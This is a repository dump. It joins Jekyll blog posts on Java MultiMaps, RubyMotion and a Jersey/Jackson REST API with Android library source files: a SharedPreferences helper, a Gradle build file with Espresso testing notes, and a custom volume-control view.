abstract Collection<V> createCollection();
@Override
public boolean put(K k, V v) {
Collection <V> collection;
if (map.containsKey(k)) {
collection = map.get(k);
collection.add(v);
map.put(k, collection);
totalSize++;
return true;
}
else {
collection = createCollection();
collection.add(v);
map.put(k, collection);
totalSize++;
return true;
}
}
@Override
public Collection<V> get(K k) {
if (map.containsKey(k)) {
return map.get(k);
}
else {
return null;
}
}
@Override
public int size() {
return totalSize;
}
public String toString() {
return map.toString();
}
}
{% endhighlight %}
The template method `createCollection()` will provide the implementation of what kind of collection we want. The `put` method first checks whether the map already contains a key, if so - the elements are added to the pre-existing Map. However, the the key is found - a new collection is assigned as a value to the new key.
## ArrayListMultiMap
`ArrayListMultiMap` will override the templated `createCollection()` method and the constructor will create a Key, Value map.
{% highlight java%}
public class ArrayListMultiMap <K, V> extends AbstractMultiMap <K, V>{
@Override
List<V> createCollection() {
return new ArrayList<V>();
}
ArrayListMultiMap() {
super(new HashMap<K, Collection<V>>());
}
}
{% endhighlight %}
## Test it out
Let's test out what we've built so far. The test will compare a regular HashMap to a MultiMap. We'll create both and assign some lists to them.
{% highlight java %}
public class MultiMapTest {
public static void main(String[] args) {
HashMap<String, Collection<Integer>> map = new HashMap<String, Collection<Integer>>();
ArrayListMultiMap<String, Collection<Integer>> multimap = new ArrayListMultiMap<String, Collection<Integer>>();
ArrayList<Integer> aList = new ArrayList<Integer>() {
{
add(1);
add(2);
}
};
map.put("UserA", aList);
multimap.put("UserA", aList);
System.out.println("map: " + map);
ArrayList<Integer> bList = new ArrayList<Integer>() {
{
add(3);
add(4);
}
};
map.put("UserA", bList);
multimap.put("UserA", bList);
System.out.println("map: " + map);
System.out.println("multimap: " + multimap);
}
}
{% endhighlight %}
Running this class will display an output as below:
{% highlight bash %}
map: {UserA=[1, 2]}
map: {UserA=[3, 4]}
multimap: {UserA=[[1, 2], [3, 4]]}
{% endhighlight %}
Notice that when a second time a collection is assigned to a regular Map, it creates a new Key, Value pair rather than appending to an existing collection like our MultiMap does.
<file_sep>/_posts/2013-04-12-Programming-Ruby-Notes.markdown
---
layout: post
title: RubyMotion
date: 2013-04-12
categories: [ios,ruby]
---
RubyMotion is a platform which lets you write Native iOS apps in plain Ruby. The Ruby code uses the iOS SDK frameworks and classes exactly as intended by Apple. So there is a clean one-to-one mapping with Objective-C functions. Although it helps to atleast be able to make sense of the Objective-C code to be able to convert it to Ruby. This post is a short introduction to RubyMotion and my experience with it so far.
## AppDelegate
`app_delegate.rb` is where the applications comes to life. Controllers can be assigned to the class to take over the role of filling in the screen.
## Controllers
Controller scan be subclassed from various controller classes defined in the iOS SDK. `UITableViewController` or `UIViewController` etc.
Depending on the controller, each will have a `viewDidLoad` method which is where all the action for that controller happens when the controller coems to life.
## Delegate Pattern
[Delegate Pattern](http://en.wikipedia.org/wiki/Delegation_%28programming%29) is followed all throughout the iOS SDK. It enables you to hand values and messages over in your class hierarchy. Classes can become their own delegates as well
## Dispatch::Queue
The `Dispatch::Queue.concurrent.async` can be used to handle concurrent events so that the UI doesn't experience lagginess.
<file_sep>/drafts/2012-02-06-jersey-jackson-guice.markdown
---
layout: post
title: RESTful with Jersey
---
Traditionally web services have been a great mess to deal with largely because of complex WS- [specifications](http://www.whatissoa.com/soaspecs/ws.php)
but the RESTful approach of dealing directly with HTTP methods has simplified web services. However, this post is not about explaining
the REST architecture, but rather about showcasing how to work with Jersey (Java's implementation of REST) along with Jackson (JSON parser).
## Prerequisite
I'm re-iterating the benefits of Jersey which other people, smarter than me, have already written about. Codahale's post about [Jersey](http://codahale.com/what-makes-jersey-interesting-parameter-classes/)
and Shaneal's post about the [modern java ecosystem](http://arantaday.com/the-modern-java-ecosystem) do a great job of explaining jersey and integration of
Guice and Jackson to make it a swiss army knife of webservices. This post and the [code](https://github.com/Omnipresent/pizzajoint) is an extension on
top of their work.
## What are we implementing?
I'm going to create a RESTful API for a pizzajoint. It'll include the basic things like listing orders, placing an order, fetching an order etc.
Something like this can be used by our pizzajoint to create a mobile app for ordering pizza or allowing a third party to place pizza
orders by accessing the webservice.
## Let's get started
We'll start with an `OrderResrouce` class that'll have annotated HTTP REST methods we want to provide the functionality for: - I cover `GET` and `Post`
Let's start with the `GET` method.
{% highlight java %}
@Path("/orders")
@Produces({MediaType.APPLICATION_JSON})
public class OrderResource {
private static final Map<Integer, Order> ORDERS = Maps.newConcurrentMap();
@GET
public Collection<Integer> listOrderIds() {
return ORDERS.keySet();
}
@GET
@Path("{id: [0-9]+}")
public Order getOrder(@PathParam("id") int id) {
final Order order = ORDERS.get(id);
if (order == null) {
throw new WebApplicationException(Response.Status.NOT_FOUND);
}
else
return order;
}
{% endhighlight %}
We've just implemented two methods, first to list orders and second to get a particular order. The `@Path` declares a path from which the
service can be requested and `@Produces` declares MediaType as JSON. We're using a `ConcurrentMap` instead of a database, so the `listOrderIds` method
returns all the order ids. The `getOrder` method defines a `@Path` which means that it'll return the result based on a particular id that is passed in.
Now let's bind our RESTful OrderResource using Guice and see it in action.
{% highlight java %}
@Override
protected Injector getInjector() {
return Guice.createInjector(new JerseyServletModule() {
@Override
protected void configureServlets () {
/* bind the REST resources*/
bind(OrderResource.class);
serve("/rest/*").with(GuiceContainer.class, INIT_PARAMS);
}
});
}
{% endhighlight %}
Guice makes dependency injection easy. In the above code we're taking advantage of the `JerseyServletModule` to bind
`OrderResource` and serving it on `/rest/` path. I love instant gratification and since we've got basic code down, lets see it in action.
{% highlight bash %}
pizzajoint% mvn -Dmaven.tomcat.port=7272 tomcat:run
pizzajoint% curl http://localhost:7272/pizzajoint/rest/orders
[]
pizzajoint% curl -sw "%{http_code}" "http://localhost:7272/pizzajoint/rest/orders/1" -o /dev/null
http_code = 404
{% endhighlight %}
Notice the `404` error thrown when we try to access order `1` when it does not exist. Error handling is important for a webservice since third party
applications will be accessing it.
## So how do we create order?
The REST way - by creating a `POST` request. Just like we annotated a method with `@GET` we can annotate a method with `@Post`, simple eh?
{% highlight java %}
@POST
@Consumes({MediaType.APPLICATION_FORM_URLENCODED})
public int prepareOrder(@FormParam("ordername") String name,
@FormParam("readydate") SimpleDateParam orderDate,
@FormParam("toppings") CsvParam csvToppings) throws IOException, Throwable {
List<Topping> toppings = Lists.newLinkedList();
Date dateOfOrder = orderDate.getValue();
for (String toppingStr : csvToppings.getValue())
toppings.add(MAPPER.readValue("\""+toppingStr+"\"", Topping.class));
final Order newOrder = new Order(name, dateOfOrder, toppings);
final Order oldOrder = ORDERS.put(newOrder.getId(), newOrder);
return newOrder.getId();
}
{% endhighlight %}
This method takes a bunch of `@FormParam`s as options that everyone wants when ordering a pizza. There are more parameters in the [code](https://github.com/Omnipresent/pizzajoint)
but here I explain three distinct parameter types: `String`, `Date`, and `CSV`. Handling a string, `ordername`, is quite simple but a date and bunch of toppings
as comma separated values will be a bit tricky. We want the user to be able to enter a date in a `String` format of `MM/dd/yyyy` and toppings in a `CSV` format
of `chicken,pepperoni,jalepeno`. Let's create `SimpleDateParam` and `SimpleCsvParam` classes.
{% highlight java %}
public class SimpleDateParam {
private static final SimpleDateFormat dateFormat = new SimpleDateFormat("MM/dd/yyyy");
private Date date = new Date();
public SimpleDateParam (String orderDate) throws WebApplicationException {
try {
this.date = dateFormat.parse(orderDate);
}
catch (ParseException e) {
throw new WebApplicationException(
Response
.status(Status.BAD_REQUEST)
.entity(e.getMessage())
.build()
);
}
}
public Date getValue() {
return this.date;
}
}
{% endhighlight %}
{% highlight java %}
public class SimpleCsvParam {
private Iterable<String> toppings;
public SimpleCsvParam (String csvToppings) throws WebApplicationException {
try {
this.toppings = Splitter.on(",").trimResults().omitEmptyStrings().split(csvToppings);
}
catch (IllegalArgumentException e) {
throw new WebApplicationException(
Response
.status(Status.BAD_REQUEST)
.entity(e.getMessage())
.build()
);
}
}
public Iterable<String> getValue() {
return this.toppings;
}
}
{% endhighlight %}
The above two classes represent parameter classes, former for handling date and latter for handling CSV parameters. Having a separate class for each
parameter type can get ugly really fast, there is a lot of DRY potential in these classes. Let's abstract out the commonalities and refactor
{% highlight java %}
public abstract class AbstractParameter <V>{
private final V value;
public AbstractParameter(String param) throws WebApplicationException{
try {
this.value = parse(param);
}
catch (Throwable e) {
throw new WebApplicationException(
Response
.status(Status.BAD_REQUEST)
.entity(e.getMessage())
.build()
);
}
}
public abstract V parse(String param) throws Throwable;
public V getValue() {
return this.value;
}
}
{% endhighlight %}
{% highlight java %}
public class SimpleDateParam extends AbstractParameter<Date>{
private static final SimpleDateFormat simpleDate = new SimpleDateFormat("MM/dd/yyyy");
public SimpleDateParam (String orderDate) {
super(orderDate);
}
public Date parse(String orderDate) throws Throwable {
return simpleDate.parse(orderDate);
}
}
{% endhighlight %}
{% highlight java %}
public class SimpleCsvParam extends AbstractParameter<Iterable<String>> {
public class SimpleCsvParam (String param) {
super (param);
}
public Iterable<String> parse(String param) {
return Splitter.on(",").trimResults().omitEmptyStrings().split(csvToppings);
}
}
{% endhighlight %}
Great, now we've extracted out the common code into AbstractParameter allowing any new parameter class to `extend AbstractParameter`.
Now, let's see the service in action by invoking the `@Post` method.
{% highlight bash %}
pizzajoint% curl -d "ordername=bhaarat&readydate=02/13/2012&toppings=chicken,jalepenos" http://localhost:8080/pizzajoint/rest/orders
[1]
pizzajoint% curl http://localhost:8080/pizzajoint/rest/order
{"id":2,"orderName":"bhaarat","dateOfOrder":"02-13-2012","toppings":["chicken","jalepenos"]}
{% endhighlight %}
In the above code you'll notice that toppings are passed in as `CSV` and the output is shown as a `JSON` array. This is because of the Jackson
JSON parser. I've created a small `Topping` class to serialize and deserialize the passed in toppings.
{% highlight java %}
@JsonSerialize(using = Topping.ToppingSerializer.class)
@JsonDeserialize(using = Topping.ToppingDeserializer.class)
public class Topping {
private final String toppingName;
public Topping (String toppingName) {
this.toppingName = toppingName;
}
public String getToppingName() {
return this.toppingName;
}
public static class ToppingSerializer extends JsonSerializer<Topping> {
@Override
public void serialize(Topping t, JsonGenerator jg, SerializerProvider sp) throws IOException {
jg.writeString(t.getToppingName());
}
}
public static class ToppingDeserializer extends JsonDeserializer<Topping> {
@Override
public Topping deserialize(JsonParser jp, DeserializationContext dc) throws IOException, JsonProcessingException {
String toppingName = jp.getText();
return new Topping(toppingName);
}
}
}
{% endhighlight %}
The above class makes use of the `Jackson` library to serialize and deserialize the objects by overriding the serialize and deserialize methods.
Each topping passed in as a comma separated value is put into a list and mapping using `ObjectMapper` provided by Jackson.
{% highlight java %}
private static final ObjectMapper MAPPER = new ObjectMapper();
List<Topping> toppings = Lists.newLinkedList();
for (String toppingStr : csvToppings.getValue())
toppings.add(MAPPER.readValue("\""+toppingStr+"\"", Topping.class));
{% endhighlight %}
Since `Topping` class is annotated with json serialier and de-serializers, every time a new item is pushed into `ObjectMapper` it goes through the serializer.
---
Give jersey a try the next time you have a need to write a RESTful webservice in java.
| e7786e10197e30bacf072c3d0c0fa504dc94c822 | [
"Markdown",
"JavaScript"
] | 11 | Markdown | Omnipresent/omnipresent.github.com | dc3264e9e386e29af7e162b7d58a0edb5c3b6f7e | b2f7f629ba7dd04857187c131c010342314291a9 |
refs/heads/master | <file_sep>package com.icenler.lib.feature.mvp.base;
import android.support.annotation.NonNull;
public interface IPresenter<V extends BaseView> {
void attachView(@NonNull V viewHandle);
void detachView();
}
<file_sep>apply plugin: 'com.android.application'
android {
compileSdkVersion rootProject.ext.compileSdkVersion
buildToolsVersion rootProject.ext.buildToolsVersion
defaultConfig {
applicationId "com.icenler.test"
minSdkVersion rootProject.ext.minSdkVersion
targetSdkVersion rootProject.ext.targetSdkVersion
versionCode 1
versionName "1.0"
testInstrumentationRunner "android.support.test.runner.AndroidJUnitRunner"
}
buildTypes {
release {
minifyEnabled false
proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro'
}
}
packagingOptions {
exclude 'LICENSE.txt'
}
}
dependencies {
compile fileTree(dir: 'libs', include: ['*.jar'])
testCompile 'junit:junit:4.12'
compile "com.android.support:appcompat-v7:$rootProject.ext.supportLibraryVersion"
compile "com.android.support:design:$rootProject.ext.supportLibraryVersion"
compile "com.android.support:support-annotations:$rootProject.ext.supportLibraryVersion"
compile "com.google.guava:guava:$rootProject.guavaVersion"
// Android Testing Support Library's runner and rules
androidTestCompile(
"com.android.support.test:rules:$rootProject.ext.rulesVersion",
"com.android.support.test:runner:$rootProject.ext.runnerVersion"
)
// Mockito
androidTestCompile(
"org.mockito:mockito-core:$rootProject.ext.mockitoVersion",
// Mockito Dependencies
"com.google.dexmaker:dexmaker:1.2",
"com.google.dexmaker:dexmaker-mockito:1.2")
// Espresso UI Testing
androidTestCompile(
"com.android.support.test.espresso:espresso-core:$rootProject.ext.espressoVersion",
"com.android.support.test.espresso:espresso-intents:$rootProject.ext.espressoVersion",
"com.android.support.test.espresso:espresso-contrib:$rootProject.ext.espressoVersion",
"com.android.support.test.espresso:espresso-web:$rootProject.ext.espressoVersion")
}
/*
ext {
// Sdk and tools
minSdkVersion = 15
targetSdkVersion = 22
compileSdkVersion = 23
buildToolsVersion = '23.0.1'
// App dependencies
supportLibraryVersion = '23.0.1'
guavaVersion = '18.0'
runnerVersion = '0.4.1'
rulesVersion = '0.4.1'
espressoVersion = '2.2.1'
mockitoVersion = '1.10.19'
}
* */
/**
* Android UI自动化测试的框架:
* 1、project/module/build.gradle
* # android -> defaultConfig -> testInstrumentationRunner "android.support.test.runner.AndroidJunitRunner"
* # android -> packagingOptions -> exclude 'LICENSE.txt'
* # android -> dependencies -> compile 'com.android.support:support-annotations:+'
* # android -> dependencies -> androidTestCompile
* - 'com.android.support.test.espresso:espresso-core:2.1'
* - 'com.android.support.test.espresso:espresso-intents:2.1'
* - 'com.android.support.test.espresso:espresso-contrib:2.1'
* - 'com.android.support.test:runner:0.2'
* 2、"Run" > "Edit Configurations" > add "Android Tests"
*
* 3、module/androidTest
* # 创建测试类
* - @Rule 指定测试 Activity
* - @Test 声明测试方法
* - 核心API类:
* * Espresso: 匹配器
* > onView(ViewMathcer).perform(ViewActoin).chek(ViewAssertion)
* 用法:寻找文本为 Hello World! 的控件是否显示
* Espresso.onView(ViewMatchers.withText("Hello World!"))
* .check(ViewAssertions.matches(ViewMatchers.isDisplayed()));
*
* > onData(ObjectMathcer).DataOptinos.perform(ViewAction).check(ViewAssertion)
* DataOptinos:
* inAdapterView(Matcher)
* atPosition(Integer)
* onChildView(Matcher)
* 用法:
* Espresso.onData(ViewMatchers.hasFocus())
* .inAdapterView(ViewMatchers.isNotChecked()).atPosition(0).onChildView(ViewMatchers.hasFocus())
* .perform(ViewActions.clearText())
* .check(ViewAssertions.matches(ViewMatchers.isDisplayed()));
*
* * ViewActions: 界面行为工具类
* > Click/Press:
* click()
* doubleClick()
* longClick()
* pressBack()
* pressIMEActionButton()
* pressKey([int/EspressoKey])
* pressMenuKey()
* closeSoftKeyboard()
* openLink()
*
* > Gestures:
* scrollTo()
* swipeLeft()
* swipeRight()
* swipeUp()
* swipeDown()
*
* > Text:
* clearText() 清空文本
* typeText(String) 设置文本
* typeTextInfoFocusedView(String) 设置文本并获取焦点
* replaceText(String) 替换文本
*
* * ViewMatchers: 匹配过滤
* > User Properties
* withId(...) 资源ID匹配
* withText(...) 文本匹配
* withTagKey(...) Tag键匹配
* withTagValue(...) Tag值匹配
* hasContentDescription(...) 是否包含ContentDescription描述
* withContentDescription(...) ContentDescription描述匹配
* withHint(...)
* withSpinnerText(...)
* hasLinks()
* hasEllipsizedText()
* HasMultilineTest()
*
* > UI Properties
* isDisplayed()
* isCompletelyDisplayed()
* isEnabled()
* hasFocus()
* isClickable()
* isChecked()
* isNotChecked()
* isSelected()
* isDisplayingAtLeast((0, 100]) 可见区域百分比匹配
* withEffectiveVisibility(...) 可见状态匹配
*
* > Object Matcher
* allOf(Matcher) 匹配所有Matcher
* anyOf(Matcher)
* is(...) 是匹配
* not(...) 否匹配
* endsWith(String)
* startWith(String)
* instanceOf(Class)
*
* > Hierarchy
* withParent(Matcher)
* withChild(Matcher)
* hasDescendant(Matcher)
* isDescendantOfA(Matcher) 是否包含子节点匹配
* hasSibling(Matcher) 是否包含兄弟节点匹配
* isRoot()
*
* > Input
* supportsInputMethods(...)
* hasIMEAction(...)
*
* > Class
* isAssignableFrom(...) 类型匹配
* withClassName(...) 类名匹配
*
* > Root Mathcers
* isFocusable() 是否获取焦点
* isTouchable() 是否可吃馍
* isDialog() 是否是窗口
* withDecorView()
* isPlatformPopup()
*
* > See Also
* Preference matcher
* Cursor matcher
* Layout matcher
*
* * ViewAssertions: 界面判断工具类
* >
* matches(Matcher)
* doesNotExist()
* selectDescendantsMatch(...)
*
* > LayoutAssertions
* noEllipsizedText(Matcher)
* noMultilineButtons()
* onOverlaps([Matcher])
*
* > Position Assertions
* isLeftOf(Matcher)
* isRightOf(Matcher)
* isAbove(Matcher)
* isBelow(Matcher)
* isLeftAlignedWith(Matcher)
* isRightAlignedWith(Matcher)
* isBottomAlignedWith()Matcher
* isTopAlignedWith(Matcher)
*
* * Intent Matchers:
* > Intent
* hasAction(...)
* hasCategories(...)
* hasComponent(...)
* hasExtra(...)
* hasExtras(Matcher)
* hasExtraWithKey(...)
* hasType(...)
* hasPackage()
* toPackage(String)
* hasFlag(int)
* hasFlags(...)
* isInternal()
* > Uri
* hasHost(...)
* hasPath(...)
* hasParamWithName(...)
* hasParamWithValue(...)
* hasScheme(...)
* hasSchemeSpecificPart(...)
* > Component Name
* hasClassName(...)
* hasPackageName(...)
* hasShortClassName(...)
* hasMyPackageName()
* > Bundle
* hasEntry(...)
* hasKey(...)
* hasValue(...)
*
* */
<file_sep>package com.icenler.lib.utils.helper;
import android.app.Application;
import android.content.Context;
import android.content.SharedPreferences;
import android.support.annotation.NonNull;
import android.text.TextUtils;
import com.icenler.lib.utils.Preconditions;
import java.util.Map;
import java.util.Set;
/**
* Created by iCenler - 2015/7/17.
* Description:SharedPreferences 帮助类
* 1、 封装常用 保存、获取、删除、清空、匹配等方法
* 2、 可初始化全局默认文件存储 or 指定文件进行存储
*/
public class SharedPrefsHelper {
/**
* 默认保存文件名称
*/
private static String DEFAULT_CONFIG = "config";
private static Context mContext;
private SharedPrefsHelper() {
throw new UnsupportedOperationException("cannot be instantiated");
}
/**
* 初始化默认保存配置文件名称
*
* @param context Application Context
* @param configName
*/
public static void initPrefsConfig(@NonNull Application app, String configName) {
mContext = app;
if (!TextUtils.isEmpty(configName))
DEFAULT_CONFIG = configName;
}
/**
* 保存数据到默认配置文件
*
* @param key
* @param val
* @param <T>
*/
public static <T> void put(String key, @NonNull T val) {
put(null, key, val);
}
/**
* 保存数据到指定配置文件
*
* @param configName
* @param key
* @param val
* @param <T>
*/
public static <T> void put(String configName, String key, @NonNull T val) {
SharedPreferences prefs = getSharedPrefs(configName);
SharedPreferences.Editor edit = prefs.edit();
if (val instanceof String) {
edit.putString(key, (String) val);
} else if (val instanceof Boolean) {
edit.putBoolean(key, (Boolean) val);
} else if (val instanceof Float) {
edit.putFloat(key, (Float) val);
} else if (val instanceof Integer) {
edit.putInt(key, (Integer) val);
} else if (val instanceof Long) {
edit.putLong(key, (Long) val);
} else if (val instanceof Set) {
edit.putStringSet(key, (Set<String>) val);
} else {
new IllegalArgumentException("No matching type value was found");
}
edit.apply();// 异步读写
}
/**
* 根据 key 值获取默认配置文件中数据
*
* @param key
* @param defVal
* @param <T>
* @return
*/
public static <T> T get(String key, @NonNull T defVal) {
return get(null, key, defVal);
}
/**
* 根据 key 值获取指定配置文件中数据
*
* @param configName
* @param key
* @param defVal
* @param <T>
* @return
*/
public static <T> T get(String configName, String key, @NonNull T defVal) {
SharedPreferences prefs = getSharedPrefs(configName);
if (defVal instanceof String) {
return (T) prefs.getString(key, (String) defVal);
} else if (defVal instanceof Boolean) {
return (T) Boolean.valueOf(prefs.getBoolean(key, (Boolean) defVal));
} else if (defVal instanceof Float) {
return (T) Float.valueOf(prefs.getFloat(key, (Float) defVal));
} else if (defVal instanceof Integer) {
return (T) Integer.valueOf(prefs.getInt(key, (Integer) defVal));
} else if (defVal instanceof Long) {
return (T) Long.valueOf(prefs.getLong(key, (Long) defVal));
} else if (defVal instanceof Set) {
return (T) prefs.getStringSet(key, (Set<String>) defVal);
} else {
throw new IllegalArgumentException("No matching type defVal was found");
}
}
/**
* @param key
* @return 查询默认配置文件对应 key 值是否存在
*/
public static boolean contains(String key) {
return getSharedPrefs().contains(key);
}
/**
* @param configName
* @param key
* @return 查询指定配置文件对应 key 值是否存在
*/
public static boolean contains(String configName, String key) {
return getSharedPrefs(configName).contains(key);
}
/**
* 删除默认配置文件下 key 对应 value 值
*
* @param key
*/
public static void remove(String key) {
getSharedPrefs().edit().remove(key).apply();
}
/**
* 删除指定配置文件下 key 对应 value 值
*
* @param configName
* @param key
*/
public static void remove(String configName, String key) {
getSharedPrefs(configName).edit().remove(key).apply();
}
/**
* @return 默认配置文件中所有数据
*/
public static Map<String, ?> getAll() {
return getSharedPrefs().getAll();
}
/**
* @param configName
* @return 指定配置文件中所有数据
*/
public static Map<String, ?> getAll(String configName) {
return getSharedPrefs(configName).getAll();
}
/**
* 清空默认配置文件下所有数据
*/
public static void clear() {
getSharedPrefs().edit().clear().apply();
}
/**
* 清空指定配置文件下所有数据
*
* @param configName
*/
public static void clear(String configName) {
getSharedPrefs(configName).edit().clear().apply();
}
public static SharedPreferences getSharedPrefs() {
return getSharedPrefs(null);
}
/**
* @param configName
* @return SharedPreferences
*/
public static SharedPreferences getSharedPrefs(String configName) {
SharedPreferences prefs;
if (!TextUtils.isEmpty(configName))
prefs = mContext.getSharedPreferences(configName, Context.MODE_PRIVATE);
else
prefs = mContext.getSharedPreferences(DEFAULT_CONFIG, Context.MODE_PRIVATE);
return prefs;
}
}
<file_sep>package com.icenler.lib.feature.activity;
import android.content.Context;
import android.content.Intent;
import android.support.design.widget.CollapsingToolbarLayout;
import android.support.design.widget.CoordinatorLayout;
import android.support.v7.widget.Toolbar;
import android.view.Menu;
import android.view.MenuItem;
import android.widget.TextView;
import com.icenler.lib.R;
import com.icenler.lib.utils.AppUtil;
import com.icenler.lib.utils.helper.ActivityHelper;
import com.icenler.lib.view.swiplayout.SwipeBackCompatActivity;
import butterknife.BindView;
public class AboutActivity extends SwipeBackCompatActivity {
@BindView(R.id.toolbar)
Toolbar mToolbar;
@BindView(R.id.collapsing_toolbar)
CollapsingToolbarLayout mToolbarLayout;
@BindView(R.id.version_tv)
TextView appVersion;
@BindView(R.id.coordinator_layout)
CoordinatorLayout mCoordinatorLayout;
public static void startMe(Context context) {
Intent intent = new Intent(context, AboutActivity.class);
context.startActivity(intent);
}
@Override
protected int doGetLayoutResId() {
return R.layout.activity_about;
}
@Override
protected void doInit() {
mToolbarLayout.setTitle(getString(R.string.about_app));
appVersion.setText(String.format("Version: %s", AppUtil.getAppVersionName(this)));
setSupportActionBar(mToolbar);
getSupportActionBar().setDisplayHomeAsUpEnabled(true);
}
@Override
protected int getDefaultStatusBarTintColor() {
return android.R.color.transparent;
}
@Override
public boolean onCreateOptionsMenu(Menu menu) {
getMenuInflater().inflate(R.menu.menu_about, menu);
return true;
}
@Override
public boolean onOptionsItemSelected(MenuItem item) {
switch (item.getItemId()) {
case android.R.id.home:
finish();
return true;
case R.id.menu_share:
onClickShare();
return true;
}
return super.onOptionsItemSelected(item);
}
public void onClickShare() {
ActivityHelper.doShare(this, "分享", "https://github.com/Cenler/AppDevLib.git");
}
}
<file_sep>package com.icenler.lib.view;
import android.content.Context;
import android.content.res.TypedArray;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import android.graphics.Canvas;
import android.graphics.Paint;
import android.graphics.RectF;
import android.util.AttributeSet;
import android.view.MotionEvent;
import android.view.View;
import com.icenler.lib.R;
import com.icenler.lib.utils.ScreenUtil;
/**
* Created by iCenler - 2015/5/11.
* Description:圆形音量控件
*/
public class VolumControlBar extends View {
private static final int DEFAULT_VOLUM_REACHED_COLOR = 0xCF000000;
private static final int DEFAULT_VOLUM_UNREACHED_COLOR = 0xCFFFFFFF;
private static final int DEFAULT_VOLUM_DOT_COUNT = 12;
private static final int DEFAULT_VOLUM_DOT_MARGIN = 8;
private static final int DEFAULT_VOLUM_DOT_STROKE = 10;
protected Paint mPaint;
protected RectF mRectF;
/**
* 已达到的样式背景色
*/
protected int mVolumReachedColor = DEFAULT_VOLUM_REACHED_COLOR;
/**
* 未达到的样式背景色
*/
protected int mVolumUnReachedColor = DEFAULT_VOLUM_UNREACHED_COLOR;
/**
* 可调节数量
*/
protected int mVolumDotCount = DEFAULT_VOLUM_DOT_COUNT;
/**
* 调节指示器间距
*/
protected int mVolumDotMargin = DEFAULT_VOLUM_DOT_MARGIN;
/**
* 调节指示器厚度
*/
protected int mVolumDotStroke = ScreenUtil.dp2px(DEFAULT_VOLUM_DOT_STROKE);
/**
* 中心图标
*/
protected Bitmap mVolumIcon;
public VolumControlBar(Context context) {
this(context, null);
}
public VolumControlBar(Context context, AttributeSet attrs) {
this(context, attrs, 0);
}
public VolumControlBar(Context context, AttributeSet attrs, int defStyle) {
super(context, attrs, defStyle);
init(attrs);
}
private void init(AttributeSet attrs) {
getObtainStyledAttributes(attrs);
mPaint = new Paint();
mPaint.setAntiAlias(true);
mRectF = new RectF();
}
@Override
protected void onDraw(Canvas canvas) {
mPaint.setStrokeWidth(mVolumDotStroke);
mPaint.setStyle(Paint.Style.STROKE);
mPaint.setStrokeCap(Paint.Cap.ROUND);// 核心:定义线段断点形状为圆头
float center = getWidth() * 0.5f;
float radius = center - mVolumDotStroke;
drawOval(canvas, center, radius);// 绘制圆点
/** 内切正方形的距离顶部 - 计算方式:假设 R 为直径,设边长为 X
* X*X + X*X = R*R
* 2*X*X = R*R
* x√2 = R
* x = √2 / 2 * R
* */
mRectF.left = (float) (radius - Math.sqrt(2) * 0.5f * radius + mVolumDotStroke);
mRectF.top = (float) (radius - Math.sqrt(2) * 0.5f * radius + mVolumDotStroke);
mRectF.bottom = (float) (mRectF.left + Math.sqrt(2) * radius);
mRectF.right = (float) (mRectF.left + Math.sqrt(2) * radius);
/**
* 如果图片比较小,那么根据图片的尺寸放置到正中心
*/
if (mVolumIcon.getWidth() < Math.sqrt(2) * radius) {
mRectF.left = (float) (mRectF.left + Math.sqrt(2) * radius * 0.5f - mVolumIcon.getWidth() * 0.5f);
mRectF.top = (float) (mRectF.top + Math.sqrt(2) * radius * 0.5f - mVolumIcon.getHeight() * 0.5f);
mRectF.right = mRectF.left + mVolumIcon.getWidth();
mRectF.bottom = mRectF.top + mVolumIcon.getHeight();
}
canvas.drawBitmap(mVolumIcon, null, mRectF, mPaint);
}
/**
* 绘制指示器
*
* @param canvas
* @param centre
* @param radius
*/
private void drawOval(Canvas canvas, float centre, float radius) {
/**
* 根据需要画的个数以及间隙计算每个块块所占的比例*360
*/
float itemSize = (360 * 1.0f - mVolumDotCount * mVolumDotMargin) / mVolumDotCount;
RectF oval = new RectF(centre - radius, centre - radius, centre + radius, centre + radius); // 用于定义的圆弧的形状和大小的界限
mPaint.setColor(mVolumUnReachedColor); // 设置圆环的颜色
for (int i = 0; i < mVolumDotCount; i++) {
canvas.drawArc(oval, i * (itemSize + mVolumDotMargin) - 90, itemSize, false, mPaint); // 根据进度画圆弧
}
mPaint.setColor(mVolumReachedColor); // 设置圆环的颜色
for (int i = 0; i < mCurrentDot; i++) {
canvas.drawArc(oval, i * (itemSize + mVolumDotMargin) - 90, itemSize, false, mPaint); // 根据进度画圆弧
}
}
/**
* 获取属性集
*
* @param attrs
*/
private void getObtainStyledAttributes(AttributeSet attrs) {
TypedArray array = getContext().obtainStyledAttributes(attrs, R.styleable.VolumControlBar);
int length = array.length();
for (int i = 0; i < length; i++) {
int index = array.getIndex(i);
switch (index) {
case R.styleable.VolumControlBar_volum_reached_color:
mVolumReachedColor = array.getColor(index, mVolumReachedColor);
break;
case R.styleable.VolumControlBar_volum_unreached_color:
mVolumUnReachedColor = array.getColor(index, mVolumUnReachedColor);
break;
case R.styleable.VolumControlBar_volum_src:
mVolumIcon = BitmapFactory.decodeResource(getResources(), array.getResourceId(index, 0));
break;
case R.styleable.VolumControlBar_volum_dot_count:
mVolumDotCount = array.getInteger(index, mVolumDotCount);
break;
case R.styleable.VolumControlBar_volum_dot_stroke:
mVolumDotStroke = array.getDimensionPixelSize(index, mVolumDotStroke);
break;
case R.styleable.VolumControlBar_volum_dot_margin:
mVolumDotMargin = array.getInteger(index, mVolumDotMargin);
break;
default:
break;
}
}
array.recycle();
}
private int xDown, xUp;
private int mCurrentDot = 3;// 默认指示器填充个数
/**
* 当前数量+1
*/
public void handleUp() {
if (mCurrentDot != mVolumDotCount) {
mCurrentDot++;
postInvalidate();
}
}
/**
* 当前数量-1
*/
public void handleDown() {
if (mCurrentDot != 0) {
mCurrentDot--;
postInvalidate();
}
}
@Override
public boolean onTouchEvent(MotionEvent event) {
switch (event.getAction()) {
case MotionEvent.ACTION_DOWN:
xDown = (int) event.getY();
break;
case MotionEvent.ACTION_UP:
xUp = (int) event.getY();
// 下滑
if (xUp > xDown)
handleDown();
else
handleUp();
break;
}
return true;
}
}
<file_sep>package com.icenler.lib.view.damp_spring;
import android.support.annotation.IntDef;
import android.support.v4.view.ViewPager;
import android.support.v7.widget.GridLayoutManager;
import android.support.v7.widget.LinearLayoutManager;
import android.support.v7.widget.RecyclerView;
import android.support.v7.widget.StaggeredGridLayoutManager;
import android.view.View;
import android.widget.GridView;
import android.widget.HorizontalScrollView;
import android.widget.ListView;
import android.widget.ScrollView;
import com.icenler.lib.view.damp_spring.adapters.AbsListViewOverScrollDecorAdapter;
import com.icenler.lib.view.damp_spring.adapters.HorizontalScrollViewOverScrollDecorAdapter;
